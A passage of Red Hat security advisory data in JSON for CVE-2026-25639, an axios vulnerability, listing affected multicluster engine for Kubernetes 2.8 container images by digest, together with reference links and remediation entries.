"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25639"
},
{
"category": "external",
"summary": "RHBZ#2438237",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438237"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25639",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25639"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25639"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57",
"url": "https://github.com/axios/axios/commit/28c721588c7a77e7503d0a434e016f852c597b57"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases/tag/v1.13.5",
"url": "https://github.com/axios/axios/releases/tag/v1.13.5"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433",
"url": "https://github.com/axios/axios/security/advisories/GHSA-43fc-jf86-j433"
}
],
"release_date": "2026-02-09T20:11:22.374000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-15T01:45:31+00:00",
"details": "For multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.13/html/clusters/cluster_mce_overview#mce-install-intro",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8218"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
